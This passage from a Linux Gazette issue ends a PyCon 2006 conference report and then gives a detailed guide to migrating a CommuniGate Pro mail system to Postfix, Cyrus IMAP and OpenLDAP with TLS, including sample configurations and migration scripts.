Bram also warned people to download BitTorrent directly from www.bittorrent.com and not from some random Google search. Shady operators are selling scams that claim to be BitTorrent but contain spyware or viruses. The real BitTorrent is free to download, and is Open Source under a Jabber-like license. The company does accept voluntary donations, however, if you really want to give them money.
The rest of PyCon was session talks, tutorials, lightning talks, Open Space, sprints, and informal "hallway discussions". The most interesting talks I saw or wanted to see were:
BaseHTTPServer.HTTPServer
in the
standard library; it's easy!) So it's not surprising that PyCon had three
talks on TurboGears, two on Django, three on Zope (plus several BoFs), and a
couple on new small frameworks. All the discussion last year about framework
integration has made them more interoperable, but it has not cut the number of
frameworks. If anything, they've multiplied as people write experimental
frameworks to test design ideas. Supposedly there's a battle between
TurboGears and Django for overall dominance, but the developers aren't
competing, they just have different interests. Jacob Kaplan-Moss (Django
developer) and I (TurboGears developer) ran the Lightning Talks together, and
we both left the room alive. Some people work on multiple frameworks, hoping
the
holy grail
will eventually emerge. Much of the work focuses on WSGI and Paste, which help tie diverse components
using different frameworks together into a single application. Some work
focuses on AJAX, which is what makes Gmail and Google Maps so responsive and is
slowly spreading to other sites.Lightning talks are like movie shorts. If you don't like one, it's over in five minutes. They are done one after the other in hour-long sessions. Some people give lightning talks to introduce a brand-new project, others to focus on a specialized topic, and others to make the audience laugh. This year there were seventeen speakers for ten slots, so we added a second hour the next day. But in the same way that adding a new freeway lane encourages people to drive more, the number of excess speakers grew rather than shrank. We ended up with thirty speakers for twenty slots, and there would have been more if I hadn't closed the waiting list. The audience doesn't get bored and keeps coming back, so next year we'll try adding a third hour and see if we can find the saturation point. Some of the highlights were:
[ I don't understand what you mean by "didn't succeed", Mike - seems to me that wildly inappropriate responses to a question is perfectly normal IRC behavior... so how could anyone tell? -- Ben ]
There were other good talks too but since I was coordinating I couldn't devote as much attention to them as I would have liked.
I attended the TurboGears sprint and worked on Docudo, a wiki-like beast for software documentation, which groups pages according to software version and arbitrary category and distinguishes between officially-blessed pages and user-contributed unofficial pages. We wrote up a spec and started an implementation based on the 20-Minute Wiki Tutorial. This version will store pages in Subversion as XHTML documents, with Subversion properties for the category and status, and use TinyMCE for editing. TinyMCE looks like a desktop editor complete with toolbars, but is implemented in Javascript. We've got parts of all these tasks done in a pre-alpha application that sort of works sometimes.
Other TurboGears fans worked on speeding up Kid templates, adding unittests, improving compatibility with WSGI middleware and Paste, using our configuration system to configure middleware, and replacing CherryPy with RhubarbTart and SQLObject with SQLAlchemy. Don't get a heart attack about the last two: they are just experimental now, won't be done till after TurboGears 1.0, and will require a smooth migration path for existing applications. We had a variety of skill levels in our sprint, and some with lesser skills mainly watched to learn some programming techniques.
There were ten people in the TurboGears sprint and fifty sprinters total. Other sprinters worked on Zope, Django, Docutils, the Python core, and a few other projects.
The sprint was valuable to me, even though I'm not fully committed to TurboGears, because I'm starting to write TurboGears applications at work: it was good to write an application with developers who know more than I do about it. That way they can say, "Don't do that, that's stupid, that's not the TG way." I would have liked to work on the RhubarbTart integration but I had to go with what's more practical for me in the short term. So sprinting is a two-way activity: it benefits the project, and it also benefits you. And it plants the seeds for future contributions you might make throughout the year.
Dallas was not the transportation wasteland I feared (ahem Oklahoma City, Raleigh, Charlotte...) but it did take 2-3 hours to get to PyCon without a car, and that includes taking a U-shaped path around most of Dallas. An airport shuttle van goes from the sprawling DFW campus to the south parking lot a mile away. From there another airport shuttle goes to the American Airlines headquarters, an apartment building (!), and finally the Dallas - Fort Worth commuter train. That's three miles or thirty minutes just to get out of the airport. The train goes hourly till 10:30pm, but not on Sundays. It cost $4.50 for an all-day rail/bus pass. The train pokes along at a leisurely pace, past flat green fields and worn-down industrial complexes, with a few housing developments scattered incongruously among the warehouses. Freight trains carried cylindrical cars labelled "Corn Syrup" and "Corn Sweetener". Good thing I wasn't near the cars with a hatchet; I feel about corn syrup the way some people feel about abortion. The train stopped in downtown Dallas at an open section of track euphemistically called "Union Station". I transferred to the light rail (blue line) going north. This train was speedy, going 55 mph underground and 40 mph above, with stops a mile apart. Not the slowpoke things you find in San Jose and Portland; this train means business. The companies along the way seem to be mostly chain stores. At Arapaho Station (pronounced like a rapper singing, "Ah RAP a ho!") in the suburb of Richardson, I transferred to bus 400, which goes twice an hour. A kind soul on the train helped me decide which bus to catch. The bus travels west half an hour along Belt Line Road, a six-lane expressway. It crosses other six-lane expressways every twenty blocks. Dallas has quite the automobile capacity. We're going through a black neighborhood now. The driver thinks the Marriott is a mile away and I should have gotten another bus, but the hotel map says it's at Belt Line Road and the North Dallas Tollway. When we approach the intersection with the birds, all is explained. The road the hotel is named after goes behind the hotel and curves, meeting the tollway. So the map was right.
[ A note from my own experience in Dallas, where I teach classes in the area described above: a shuttle from DFW is ~$20 for door-to-door service, and takes less than a half an hour. -- Ben ]
Around the hotel is mostly expense-account restaurants for the executive crowd. We didn't find a grocery store anywhere. So I learned to eat big at meals because there wouldn't be any food until the next one. There was a mall nearby and a drugstore, for all your non-food shopping.
The weather was... just like home (Seattle). Drizzle one day, heavy rain the next, clear the day after. Same sky but ten degrees warmer. Then the temperature almost doubled to 80 degrees (24C) for three days. In February! I would have been shocked but I've encountered that phenomenon in California a few times.
Saturday evening a local Pythoneer took two of us to downtown Dallas. Downtown has several blocks of old brick buildings converted to loft apartments and bars and art galleries, and a couple coffeehouses and a thrift shop. Another feature is the parking lot wavers. I swear, every parking lot had a person waving at the entrance trying to entice drivers. It's 10pm, you'd think the lot attendants would have gone home. Especially since there were plenty of metered spaces on the street for cheaper. There weren't many cars around: there were almost as many parking lots as cars! It was a bit like the Twilight Zone: all these venues and not many people. We went to Café Brazil, which is as Brazilian as the movie. In other words, not at all.
PyCon will be in Dallas next year around February-April, so come watch the birds. The following year it might be anywhere in the US.
1 Guido van Rossum, Python's founder.
2 The name "Cheese Shop" comes from a Monty Python skit. The Cheese Shop was formerly called the Python Package Index (PyPI), but was renamed because PyPI was confused with PyPy, a Python interpreter written in Python. They are both pronounced "pie-pie", and the attempt last year to get people to call PyPI "pippy" failed. Some people don't like the term "Cheese Shop" because it doesn't sell any cheese. But the shop in the skit didn't either.
Talkback: Discuss this article with The Answer Gang
Mike is a Contributing Editor at Linux Gazette. He has been a
Linux enthusiast since 1991, a Debian user since 1995, and now Gentoo.
His favorite tool for programming is Python. Non-computer interests include
martial arts, wrestling, ska and oi! and ambient music, and the international
language Esperanto. He's been known to listen to Dvorak, Schubert,
Mendelssohn, and Khachaturian too.
By René Pfeiffer and pooz
Once upon not so very long ago, a proprietary mail service system decided to stop working by completely suspending all activities every 15 minutes. We quickly used a workaround to regularly restart the service. After that, the head of the IT department approached Ivan and me and asked for a solution. We proposed to replace the mail system by a combination of Postfix, Cyrus IMAP, and OpenLDAP along with a healthy dose of TLS encryption. This article sheds some light on how you can tackle a migration like this. I am well aware that there is plenty of information for every subsystem, but we built a test system and tried a lot of configurations because we didn't see a single source of information that deals with the connection of all these parts.
First I have some words of caution.
Moving thousands of user accounts with their mailboxes from one mail platform to another shouldn't be done lightly. We used a test server that ran for almost two months and tried to look at most of the aspects of our new configuration. Here is a rundown of important things that should be done in advance.
You need to have a rough idea of what you want to achieve before you start hacking config files. Our idea was to replace the mail system running on CommuniGate Pro with a free software equivalent. Since our infrastructure is spread among multiple servers, we only had to worry about the mail server itself: how to recreate the configuration, how to move the users' data, and how to reconnect it with our external mail delivery and web mail system. We have external POP3/IMAP users that access their mail directly, and the web mail system uses IMAP. The relation of every server and service is shown in this little picture.
Putting everything together: we wanted a Cyrus server to handle the mailboxes, a Postfix server to deal with incoming and outgoing email, and an OpenLDAP server to hold as many settings as possible. The LDAP tree gets a lot of requests (we get 80000+ mail requests per day), so we decided that every server involved with user email should have a local copy in the shape of two OpenLDAP slave servers. The green lines in the diagram are read operations. The red lines are write operations. The blue lines denote SMTP transactions. Mail enters our system at the firewall, and every mail for outside domains is handled by the firewall, too. We will now take a look at how the services in the white boxes have to be configured in order to work in tune.
All of the software packages involved in the mail system are capable of using encryption via Transport Layer Security (TLS). We like to use TLS with SMTP, have our OpenLDAP servers do all synchronisations via LDAPS/LDAP+TLS, and offer IMAPS and POP3S.
TLS can be implemented by using OpenSSL and putting the necessary keys and certificates into the right place. You need the following files:
mkdir myCA chmod 0700 myCA cd myCA mkdir {crl,newcerts,private} touch index.txt echo "01" > serial cp /usr/share/examples/openssl/openssl.cnf .
Use the sample openssl.cnf file and edit the values in the section ca or CA_default. The paths need to point to the directories we have just created. You also need to edit the information about your CA in the root_ca_distinguished_name section. A sample openssl.cnf is attached to this article.
When you have taken care of your CA's configuration you can create its private key and certificate.
openssl req -nodes -config openssl.cnf -days 1825 -x509 -newkey rsa -out ca-cert.pem -outform PEMAfter that, all you have to do is to create a key and a certificate request for every server you wish to involve in encrypted transmissions.
openssl genrsa -rand /dev/random -out yourhost.example.net.key openssl req -new -nodes -key yourhost.example.net.key -out yourhost.example.net.csrI use /dev/random as the entropy source. If your system lacks sufficient I/O (i.e., keyboard strokes or mouse movements) or has no hardware random generator, you might consider using /dev/urandom instead. Signing this key with your own CA in this directory is done by using:
openssl ca -config openssl.cnf -in yourhost.example.net.csr -out yourhost.example.net.cert
In order to use encryption and to allow certificate verification, you will have to copy your CA's certificate ca-cert.pem, your host's key yourhost.example.net.key, and the key certificate yourhost.example.net.cert to your system configuration. We will soon see how we use these parts together with Postfix and OpenLDAP.
The idea is to use a central OpenLDAP server to store all user settings and some of the Postfix lookup maps. We use the LDAP tree of our organisation dc=example,dc=net and create a subtree for all our accounts. Then we create another subtree for the Postfix settings. You can think of the subtrees being containers for data, mainly accounts.
The gidNumber, homeDirectory and uidNumber attributes are only necessary if you have services other than POP3/IMAP get their information from the LDAP tree. Cyrus and Postfix don't need them. The same is true for the sambaSID. Since we reorganise our user account data anyway, we can do it properly in case other applications want to use the LDAP tree as well. Additional attributes handy for mail processing are the following.
Two other new classes are the lookupName and lookupTableEntry for the Postfix lookup tables. Postfix supports arbitrary lookup schemes. lookupName is a container for single lookupTableEntry entries that match a lookupKey to a lookupValue. This allows for a very simple mapping of anything to anything.
lookupKey=rene.pfeiffer@example.net ---> lookupValue=lynx lookupKey=ivan.averintsev@example.net ---> lookupValue=ivan lookupKey=disable@example.net ---> lookupValue=devnull
For your convenience this schema definition is also in a separate file. Use it as you like.
First of all it is necessary to extract all the account information including user names, passwords, quote settings, aliases, and the like. The CommuniGate server offers an LDAP export. Querying all user data can be done with a Perl script named cgate_migrate_ldap.pl. The script extracts the attributes cn, sn, uid, mail and userPassword. The result is written to our new LDAP server. If the user already exists on the target server, the user information is compared and updated provided there is a difference. You can take a look the the script's options by using perldoc cgate_migrate_ldap.pl.
Unfortunately this export does not cover all necessary information, so we had to write a second Perl script that collects additional information from the server's account.settings files. These files look like the following, and usually live inside the user's directory /var/CommuniGate/Accounts/user.name.macnt/.
{ DefaultMailboxType = MailDirMailbox; ExternalINBOX = NO; MaxAccountSize = 100M; MaxWebSize = 0; Password = XXXXXXXX; RealName = "Rene Pfeiffer"; RPOPAllowed = NO; Rules = ((0,"#Vacation",(("Human Generated","---"),(From,"not in","#RepliedAddresses")), (("Reply with","Ich bin vom 6. bis 13. Oktober 2005 fuer Nachrichten\enicht erreichbar. Bitte alle dringenden Anfragen\ean help@example.net richten."), ("Remember 'From' in",RepliedAddresses)))); }You can see the quota setting and the automated rules for vacation messages or mail forwardings. They aren't exported via LDAP and have to be obtained this way. First, we need all account.settings files. You can collect all of them with the following commands (you must have read permissions):
cd /var/CommuniGate/Accounts/ find . -type f -name account.settings | xargs -i{} tar -r --numeric-owner -f ~/as.tar {}You can then copy the archive as.tar to another place where fiddling with the files doesn't cause any harm. We moved it to our test server, extracted it, and built a list of paths to all files. We then used this list as input to our Perl script.
mkdir accounts cd accounts tar -xf ~/as.tar find ~/accounts -type f -printf "%h%f\n" > ~/as_list.txtNow you can feed this list to cgate_account_settings.pl and update the user settings in the LDAP tree.
~/cgate_account_settings.pl --target ldapmaster.example.net ~/as_list.txtAgain, you can look up the options of the script by using perldoc. The migration script has some built-in defaults to reduce the size of the command in the command line. The last thing missing is the user alias list. The CommuniGate stores it as a single file, /var/CommuniGate/Accounts/Settings/aliases.data. Every user is listed with all aliases in a single line. The format looks like this:
rene.pfeiffer = (r.pfeiffer,rpfeiffer,lynx);A third script, cgate_alias_settings.pl, took care of parsing this file and writing the aliases to the mailAlternateAddress attribute. It is invoked similarly to the other two.
~/cgate_alias_settings.pl --target ldapmaster.example.net aliases.data
That's all we wanted to extract. Important note: The scripts we used worked well enough for our case. We tried to get as much information as possible. We didn't want to parse everything. So be careful and test these scripts before you use them on live data. They might miss something.
The CommuniGate Pro has a built-in list server. It works fairly well, but it has the habit of rewriting the mail headers when forwarding mail to lists (and to users - that's one of the reasons why we decided to switch). So far we haven't seen any sign of the list configuration. They aren't exported via LDAP and the user settings don't have any list settings. Since we wanted to move the lists to our new list server and therefore to change their addresses anyway, we extracted all list members and created simple exploder lists with Postfix hash tables. The CommuniGate stores all list information in the /var/CommuniGate/Accounts/LISTS/ folder. The files ending with .list contain all subscribers. A shell script can read all lists and create the maps for the Postfix.
./create_list_maps.sh /var/CommuniGate/Accounts/LISTS/ ~/cgate_lists
We will use cgate_lists in our Postfix configuration later. Important note: This simple script ignores deactivated users on mailing lists. This is only a temporary solution until you can recreate the lists on a real list server and have the list owners check their subscribers.
Whenever you copy mailboxes from one server to another, you have to keep in mind how the clients see the mail data. We tried to make the move as smooth as possible. Two things got into our way. First of all, the Cyrus IMAP server treats the INBOX as the root and shows all other mail folders "below" the INBOX. The old mail system used a flat-hierarchy namespace.
Old server: imap://imap.domain.xyz/Sent Cyrus IMAP: imap://imap.domain.xyz/INBOX/Sent
Most clients get the idea and display the folders accordingly. We had to hack our webmail in order to subscribe all the old folders with the new namespace in order not to bother our web users. Clients such as mutt, Thunderbird or Sylpheed handle this change for you; however, you still need to rearrange the folder structure. Some clients need to recreate the account settings by adding a new account.
Another issue concerns the user names. By default Cyrus uses the netnews namespace convention. This means that a "." is used to separate hierarchical layers (as the Usenet does). If you allow "." to appear in a user's login, then you need to configure Cyrus to use the UNIX hierarchy convention. Cyrus uses the simple option unixhierarchysep=yes|no in its configuration. By doing this a "/" is used as a separator. Don't be suprised to see something like "user.rene^pfeiffer" in the logs or mail store. This is how a mailbox is addressed by Cyrus IMAP, and the "." in the login is handled internally as a "^".
When we extracted the user settings, we copied them 1:1 into the LDAP tree and into the Cyrus user settings. We also did this for the quota. To our great surprise, this created a rather unpleasant situation. Apparently the CommuniGate and the Cyrus server compute the quotas differently. Mailboxes that were almost at the limit on the old system became over quota on Cyrus. So we had to add 5 MB to the quota of every user in order to accommodate the mail from the old mailbox. Make sure that you have a buffer for this, or your users will lose emails.
Ok, let's get our hands dirty and configure the servers.
Designing an LDAP hierarchy is a complex topic. You can spend months thinking about the best way to go. We won't do an elaborate design. We need to store our users' settings and the Postfix lookup tables, that's all. If you want to extend your LDAP tree beyond that, make sure that you get well acquainted with the concepts. We use OpenLDAP for all LDAP servers. Most Linux distributions have a pre-packaged version. You can also compile the server from source. Use whatever method you feel comfortable with - but make sure that you can handle the upgrades and the bug fixing. We compiled OpenLDAP from source and used the following options.
./configure --sysconfdir=/etc/ldap --localstatedir=/home/ldap/var \ --with-cyrus-sasl --with-threads --with-tls --enable-slapd --enable-crypt \ --enable-spasswd --enable-wrappers --enable-ldbm --enable-perl --enable-shell --enable-slurpdMake sure that you have Berkeley DB, OpenSSL, Cyrus SASL, Perl, TCP wrappers, and GNU dbm, plus their development packages, installed. After compiling and installing you should end up with
The OpenLDAP distribution includes a couple of schema definitions. These cover the basic LDAP object classes and their attributes. We extended the schemas by using additional schema files from Sendmail, Samba, Mozilla, and a modified schema file from qmail-ldap. You can simply add the schema files to your existing configuration. However, you have to take care that your schemas don't define any attributes twice. It's best to test that in advance. We will now build the configuration for the master and the two slave servers.
Basically an OpenLDAP server is a program that exports a directory filled with databases via the network. You have to configure the paths to the database store, where it finds the schema files, where it stores its process ID, and the permissions for the LDAP tree. I have provided a sample slapd.conf config file, and I will highlight the most important options. First we have the schema files.
include /etc/ldap/openldap/schema/core.schema include /etc/ldap/openldap/schema/cosine.schema include /etc/ldap/openldap/schema/nis.schema include /etc/ldap/openldap/schema/misc.schema include /etc/ldap/openldap/schema/inetorgperson.schema include /etc/ldap/openldap/schema/sendmail.schema include /etc/ldap/openldap/schema/samba.schema include /etc/ldap/openldap/schema/mozillaOrgPerson_V0.6.schema include /etc/ldap/openldap/schema/greenmta.schema include /etc/ldap/openldap/schema/lookup.schemaThe schema files are included in this order. You can see that we have chosen to put our server config into /etc/ldap/openldap/.
The next important part deals with encryption. I mentioned earlier that every server should have a key and a certificate. Copy these files to your config directory and tell OpenLDAP to read and to use them. You also have to include your CA's certificate if you want to check the signature.
TLSCACertificateFile /etc/ldap/openldap/cacert.pem TLSCertificateFile /etc/ldap/openldap/master.example.net.cert TLSCertificateKeyFile /etc/ldap/openldap/master.example.net.key TLSRandFile /dev/random
We use /dev/random as the entropy source since our servers have hardware entropy generators. If your machine lacks good entropy sources, you should use /dev/urandom instead.
Now we define where our databases live and what the root of the LDAP tree will be. We also configure an OpenLDAP super user.
database bdb suffix "dc=example,dc=net" rootdn "cn=ldaproot,dc=example,dc=net" rootpw {SSHA}Rwilfur49jrtPsw7dJJPp5RBoX2f+gHV directory /var/lib/ldapWe want to use the Berkeley databases (bdb). The root of our tree is called dc=example,dc=net. Our superuser account is called cn=ldaproot,dc=example,dc=net. The password is hardcoded into the config file; therefore, it is a good idea to encode it so that not everyone can see it immediately. The command slappasswd can be used to do this.
lynx@wombat:~$ /usr/local/sbin/slappasswd -s 6202f430d9c9a97da8d041946847643f {SSHA}Rwilfur49jrtPsw7dJJPp5RBoX2f+gHV lynx@wombat:~$
The password is 6202f430d9c9a97da8d041946847643f. The output of slappasswd can be pasted into the config file. The last option defines the directory where the databases are stored.
The OpenLDAP master server holds the master copy of the LDAP tree. Every change is copied immediately to all slave servers. This is called replication. It is a kind of instant backup with the difference that the date is transferred to live servers. The master server needs to know where to copy the data to. This can be configured by using the replica directive.
replogfile /var/lib/ldap/replogfile replica uri="ldaps://slave1.example.net" starttls=yes bindmethod=simple \ binddn="cn=ldaproot,dc=example,dc=net" credentials="6202f430d9c9a97da8d041946847643f" replica uri="ldaps://slave2.example.net" starttls=yes bindmethod=simple \ binddn="cn=ldaproot,dc=example,dc=net" credentials="6202f430d9c9a97da8d041946847643f"
Every replica line describes the slave server along with the full login information. The account at the slave server needs full write permissions, or else the information on the slave servers can't be written. That's why we used the LDAP superuser. Another approach is to define a special replication user just for this purpose. The master server keeps a log of changes for every slave. In case a connection to a specific slave is lost, the changes get buffered and are sent to the slave as soon as it is reachable again.
The OpenLDAP slave servers have a similar configuration to the master server. You have to keep some important things in mind.
After that, your master server should log into the slave and send updates as soon as you modify the master LDAP tree. Master and slaves have a steady TCP connection that you can see by using netstat. Important note: Don't forget to create a new key and certificate for the slave or else the encryption won't work.
We used standard Debian Postfix packages. You have to install the packages postfix, postfix-ldap, postfix-pcre, and postfix-tls for the functionality we need. If you compile from source, make sure you have the PCRE, OpenLDAP, and OpenSSL development files installed.
The Postfix server can be linked to any LDAP V3 server. Since the OpenLDAP server is similar to an electronic phonebook, it makes sense to connect the Postfix to any entries that it might have to look up when receiving email.
By retrieving this information from the LDAP tree, you can map almost everything to your local mailboxes. Our scenario has one main domain that goes into mydestination (plus the local names for the machine). All satellite domains with just a few aliases go into the virtual_alias_domains where the email address is mapped to real local mailboxes by our lookupTable object class.
Well, this is all nice, but how is it written to the Postfix configuration? Let's start with mydestination. Usually you list the local domains as a simple string like this:
mydestination = agamemnon.example.net, localhost.localdomain, localhostIf you want Postfix to get this information from the OpenLDAP server, you just have to change this line to
mydestination = localhost, ldap:/etc/postfix/mydestination.cfand create the file /etc/postfix/mydestination.cf. The string 'localhost' is hardcoded into the configuration, because localhost isn't likely to go anywhere else. After that Postfix reads mydestination.cf. This file tells Postfix how to connect to the LDAP server, where and how to search for the local domains. If we connect to the OpenLDAP slave server on localhost, we don't need TLS since we'll be talking to the loopback device. We tell Postfix to look into the mydestination subtree and look for the attribute lookupKey.
server_host = 127.0.0.1 server_port = 389 search_base = lookupName=mydestination,cn=postfix,cn=mailstore,ou=server,ou=edv,dc=example,dc=net scope = sub timeout = 30 bind = yes bind_dn = cn=postfix,ou=system,ou=accounts,dc=example,dc=net bind_pw = XXXXXXXXXX version = 3 start_tls = no query_filter = (lookupKey=%s) result_attribute = lookupValueIn the case of mydestination, the result attribute can contain anything. If Postfix finds a match, it knows that the domain is local. If it doesn't, then the mail is rejected. This technique can now be used for other lookup tables. Some directives will involve multiple lookups in different tables, but this is no problem for Postfix.
alias_maps = hash:/etc/aliases, hash:/etc/postfix/cgate_lists virtual_alias_domains = ldap:/etc/postfix/virtual_alias_domains.cf virtual_alias_maps = ldap:/etc/postfix/mailforwards.cf ldap:/etc/postfix/virtual_alias_maps.cf ldap:/etc/postfix/ldap-user-aliases.cf local_recipient_maps = ldap:/etc/postfix/local_recipient_maps.cf $alias_maps $virtual_alias_maps
The alias_maps are the local lookup tables for the system aliases. We use no LDAP lookup there, because we're dealing with static names. We also put the migrated mailing lists there. They consist of simple exploder lists where the left side is the name of the list and the right side holds all subscribers. Bear in mind that this is a poor substitution for a full list server and a temporary solution at best.
The virtual_alias_domains is a table with virtual domains, just as the name implies. This is only "half" of a lookup table since Postfix only needs to know if a domain is present and counts as virtual or not. Postfix therefore only evaluates the result of the LDAP search - found or not found. Technically this means that you can put what you want into the lookup value when adding a virtual domain. You can take a look at virtual_alias_domains.cf to see that there is no difference from the lookup method we already discussed.
We then define the virtual_alias_maps by a number of three LDAP lookups. The order is important.
The last lookup definition deals with anything that is recognised as local. That's the job of local_recipient_maps. We consider anything local that is either defined in alias_maps, virtual_alias_maps, or by the lookup configured in local_recipient_maps.cf. The LDAP table simply looks in the account branch for any valid user account.
Any mail bound for local recipients must be stored into the mailboxes. Postfix doesn't handle mailboxes, but the Cyrus IMAP server does. Both servers support the Local Mail Transfer Protocol (LMTP). LMTP is a queueless mail transmission protocol used for local mail transport, as the name suggests. Postfix's configuration file needs the following directives.
mailbox_transport = lmtp:localhost lmtp_sasl_auth_enable=yes lmtp_sasl_password_maps=hash:/etc/postfix/lmtp_passwd lmtp_sasl_security_options = noanonymousmailbox_transport indicates where the LMTP receiver is located. You might need to add a definition for lmtp to your /etc/services. Important: LMTP must not use port 25! The other three lines tell Postfix that the LMTP transmission requires authentication. Cyrus has its own accounts for its subsystems and we wanted to have an lmtpadmin. Thus the file lmtp_passwd contains:
localhost lmtpadmin:secretpassword
It advises Postfix to use the username lmtpadmin with the given password when using LMTP on localhost.
TLS is the last setting we need. Postfix supports TLS encryption with many configuration options. The bare bones setup needs only a few. Here is the part for the SMTP server subsystem:
smtpd_tls_cert_file = /etc/ldap/openldap/mailstore.example.net.cert smtpd_tls_key_file = /etc/ldap/openldap/mailstore.example.net.key smtpd_tls_CAfile = /etc/ldap/openldap/ca-cert.pem smtpd_use_tls = yes smtpd_enforce_tls = no smtpd_tls_ask_ccert = no smtpd_tls_req_ccert = no smtpd_tls_dh1024_param_file = /etc/postfix/dh_1024.pem smtpd_tls_dh512_param_file = /etc/postfix/dh_512.pemThe first three lines tell Postfix where the key, the certificate, and the CA's certificate is stored. Then we switch TLS on. Make sure that you still accept connections without TLS (TLS-only mail servers do not strictly conform to the RFCs). smtpd_tls_ask_ccert and smtpd_tls_req_ccert say that we neither request nor require client certificates. smtpd_tls_dh1024_param_file and smtpd_tls_dh512_param_file point to files that contain the so-called Diffie-Hellman key agreement protocol parameters. You can either copy them from existing configurations or create them yourself by using OpenSSL.
openssl gendh -out /etc/postfix/dh_1024.pem -2 -rand /dev/random 1024 openssl gendh -out /etc/postfix/dh_512.pem -2 -rand /dev/random 512
By executing the above command, the parameters are generated. Important note: The above lines use /dev/random as the entropy source. Again, if your server has no good entropy sources such as sufficient disk I/O or hardware entropy gatherers, then you should consider using /dev/urandom instead.
Postfix acts as an SMTP client when delivering outbound mail. This part has separate TLS config options.
smtp_use_tls = yes smtp_tls_note_starttls_offer = yes smtp_tls_CAfile = /etc/ldap/openldap/ca-cert.pem
They are similar to the server options above.
You can read the whole Postfix configuration main.cf and see all of the options together.
We used the Debian Cyrus IMAP package. It is quite painless to install, and you only need to take care of a few things. The configuration files you will be dealing with are
Whenever an user wishes to fetch email via IMAP or POP3, the Cyrus server needs to verify the login information. One possibility to do this with our OpenLDAP servers is to use the SASL AUTH daemon and plaintext authentication. Plaintext isn't a problem since we offer TLS for every connection. Every client capable of TLS is able to encrypt the session with the Cyrus server. The LDAP parameters are defined in /etc/saslauthd.conf:
ldap_servers: ldap://127.0.0.1/ ldap_version: 3 ldap_timeout: 10 ldap_time_limit: 10 ldap_cache_ttl: 30 ldap_cache_mem: 32768 ldap_scope: sub ldap_search_base: ou=accounts,dc=example,dc=net ldap_auth_method: custom ldap_bind_dn: cn=ldaproot,dc=example,dc=net ldap_password: 6202f430d9c9a97da8d041946847643f ldap_filter: uid=%U
The SASL AUTH daemon is told to connect to the local LDAP slave and to search for a match between login name and the attribute uid. In order to check the password, the daemon has to bind as LDAP superuser, because only the superuser has access to the userPasswd attribute. If you are uncomfortable with this, you can define additional LDAP users that may check userPasswd. The other parameters set limits and the search tree. Important note: This file mustn't be word-readable! It contains an important password, so guard this information well.
Now your SASL AUTH daemon knows where to look for login information. You still have to tell the Cyrus IMAP that it should utilise the SASL AUTH daemon.
Now we turn to the other two configuration files, namely cyrus.conf and imapd.conf. I won't explain every single option; I'll focus on the things that connect our services instead. In order to make Cyrus use the SASL AUTH daemon for authentication, you need to check for the following entries in imapd.conf:
allowplaintext: yes sasl_mech_list: PLAIN sasl_pwcheck_method: saslauthdCyrus will then allow plaintext logins and ask saslauthd to verify the login credentials. I mentioned encryption earlier. Now you have to decide whether you want to force your mail clients to use encryption or not. There is an option that sets the minimum amount of protection for the login. You could use either
tls_cert_file: /etc/ldap/openldap/mailstore.example.net.cert tls_key_file: /etc/ldap/openldap/mailstore.example.net.key tls_ca_path: /etc/ssl/certsThe CA's certificate file must be stored in the directory /etc/ssl/certs/. Again you have a choice of policy:
If you want to use the second method, you have to make sure that every mail client can verify your certificate. Thus the first way only encrypts, while the second checks for the right identity.
As for the settings that control mail delivery via IMAP or POP3, be sure to check for
popminpoll: 0
We ran our server with popminpoll: 1 to reduce the impact of impatient mail clients. If you do this, then Cyrus will lock out any software that polls too often. Surprisingly there are a lot of mail clients out there that do funny stuff with poll intervals and use multiple connections while polling email. We switched the checks off. The load you save on the server will only be redirected to the phone support lines. For us it wasn't worth the effort. The same is true for APOP. APOP is a way to hide the password from sniffers when fetching email. We prefer TLS, so we turn APOP off.
allowapop: no
You have to define admin users for the Cyrus server. Admin users are regular Cyrus users with privileges.
admins: cyrusadmin postmaster lmtp_admins: lmtpadmin
We have two Cyrus superusers named cyrusadmin and postmaster (we need a postmaster mailbox anyway). We also have a separate admin lmtpadmin. These accounts have passwords and can be used on the Cyrus command line or via the Cyrus Perl packages Cyrus::IMAP::Admin.
The migration of all user account meta data is done through the three Perl scripts. This takes care of any settings concerning login, email adresses, aliases, quotas and the like. Bear in mind that the three scripts work well enough, but they are not 100% accurate. You will miss some mail forwardings or other things. All this takes place on the LDAP side. We still have to deal with the IMAP mailboxes and their content.
Since we must all bow to the master LDAP tree, we came up with a script that reads every user description from the master, connects to the Cyrus IMAP server, compares account information, and updates them on the Cyrus side, including the creation of new mailboxes. The Perl module Cyrus::IMAP::Admin is very handy for things like this. cyrus_syncboxes.pl does the synchronization. It is designed to run on the mail server, since this server also carries an LDAP slave, but you can feed options to the script to make it talk to other hosts as well. It has documentation that can be viewed by using perldoc cyrus_syncboxes.pl.
Now is the critical moment. We need to migrate the users' mail. Gilles Lamiral has created a fine piece of software for this job. It is called imapsync. It synchronizes IMAP boxes. By using it on an empty and a full IMAP box, it recreates the folder structure of the full box on the empty one. You can use it like this:
imapsync --host1 oldserver.example.net --user1 r.pfeiffer --password1 XXXXXXXX \ --host2 newserver.example.net --user2 r.pfeiffer --password2 XXXXXXXX \ --syncinternaldates
It then copies the whole mailbox of user r.pfeiffer from oldserver.example.net to newserver.example.net. The switch --syncinternaldates preserves the folder internal timestamps of the messages. Every mail has two timestamps - the RFC 822 date in the header and the RFC 2060 Internal Date Message Attribute. Most IMAP clients can be configured to display either date. If you preserve the internal timestamps, you will have less trouble with IMAP clients or users getting confused about changing timestamps in messages. imapsync has many more features, but we only needed to use this one.
You have to call imapsync for every mailbox. If you have several thousand mailboxes, then you need to use a little shell script and a list of usernames with the passwords in CSV (Comma Separated Value) format.
user0001;password0001;user0002;password0002 user0011;password0011;user0012;password0012We created a CSV list of all login data from our LDAP tree. When you have this list, you can pack the command into a shell loop and process the mailboxes in serial order. This fragment is taken from the imapsync documentation.
{ while IFS=';' read u1 p1 u2 p2; do imapsync --user1 "$u1" --password1 "$p1" \ --user2 "$u2" --password2 "$p2" \ --syncinternaldates done ; } < login_data.csv
Now is the time for some fresh coffee and the last checks before the new system goes online. The syncing of the mailboxes takes a while. We needed several hours for about 14 GB of mailbox data.
After doing all the steps I have described, you should have a shiny new mail system with lots of users and mailboxes. Before you put everything into production mode, you should spent some time on testing the whole setup. You can tell Postfix not to create terminal bounces by using
soft_bounce = yes
in main.cf. If valid mail is rejected, you can see it in the logs and correct the settings. Also check the access to the mailboxes by using POP3 and IMAP clients. Leave the old server for a while so that you can compare folder contents. If you are comfortable with everything, switch to production mode, but make sure you monitor the new system closely. Well, have fun with the new setup!
You need tools to get your work done. Here are ours.
